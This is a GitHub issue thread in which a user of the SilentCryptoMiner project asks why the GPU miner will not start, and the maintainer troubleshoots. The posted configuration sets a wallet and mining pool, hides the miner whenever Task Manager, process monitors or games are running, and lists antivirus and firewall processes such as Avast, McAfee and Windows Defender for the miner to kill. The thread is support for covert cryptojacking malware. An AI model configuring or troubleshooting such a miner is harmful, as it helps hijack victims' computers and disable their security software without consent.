### ISSUE TITLE
miner doesn't work

### ISSUE THREAD

**Issue by YOTYTeaM** [UnamSanctam/SilentCryptoMiner#538]
without Anti Virus
in first run
![image](https://user-images.githubusercontent.com/72147356/161431829-9a742b70-7f9e-405b-be07-756cb7035bf0.png)

Miner Json:
```
{
    "url": "stratum://`0xbDc9D844599C49b2b1f3E563c25D6e9226568617`.UT_CS@eth-eu2.nanopool.org:9999",
    "algo": "ethash",
    "max-gpu": 30,
    "idle-wait": 5,
    "idle-gpu": 90,
    "stealth-targets": "Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,AndroidEmulatorEn.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe",
    "kill-targets": "afwServ.exe,aswEngSrv.exe,aswidsagent.exe,aswToolsSvc.exe,AvastSvc.exe,AvastSvc.exe,AvastUI.exe,wsc_proxy.exe,AvastBrowser.exe,AvastNM.exe,ashwebsv.exe,aswupdsv.exe,efpeadm.exe,VPNGUI.exe,CVPND.exe,IPSECLOG.exe,cfp.exe,fsdfwd.exe,fsguiexe.exe,blackd.exe,kpf4gui.exe ,MSSCLL.exe,MCSHELL.exe,MPFSERVICE.exe,MPFAGENT.exe,nisum.exe,smc.exe,persfw.exe,pccpfw.exe,WINSS.exe,ZLCLIENT.exe,MCODS.exe,MCSHIELD.exe,msmpeng.exe,navapsvc.exe,avkwctl.exe,fsav32.exe,mcshield.exe,ntrtscan.exe,avguard.exe,ashServ.exe,AVENGINE.exe,avgemc.exe,tmntsrv.exe"
}
```

**Comment by UnamSanctam** [comment]
You don't have a GPU so it doesn't start the GPU miner.

**Comment by YOTYTeaM** [comment]
i did and it happened again
I think the problem is in the url:
![image](https://user-images.githubusercontent.com/72147356/161518756-e360b64d-1190-490c-a25c-327e8d0d2f81.png)
"url": "stratum://`WALLET`.UT_CS@eth-eu2.nanopool.org:9999",

**Comment by UnamSanctam** [comment]
No it's correct but you don't have a GPU so the miner won't start (it's designed not to start).

**Comment by YOTYTeaM** [comment]
I also tested it on my Windows (main) and it did not work
I have GPU

**Comment by UnamSanctam** [comment]
Can you post a screenshot of the checker?

**Comment by YOTYTeaM** [comment]
![image](https://user-images.githubusercontent.com/72147356/161520239-d44c7208-9a8f-4461-a5d0-bd4e9ee54450.png)

**Comment by UnamSanctam** [comment]
Since you only have a 2GB card and ETH requires 4.9GB it's possible that it quit (it depends on the GPU), you could also try updating your GPU drivers if you haven't already. You can also try the example settings at the top of the wiki https://github.com/UnamSanctam/SilentCryptoMiner/wiki to see if it's your settings or GPU. The GPU miner will only run when it can to prevent any errors or issues (as does the majority of miners).

**Comment by YOTYTeaM** [comment]
Well, I'll check it out in another graphic
I had tried it before with another graphic, it showed both the miner and the watchdog was on, but it did not mine.
Thanks
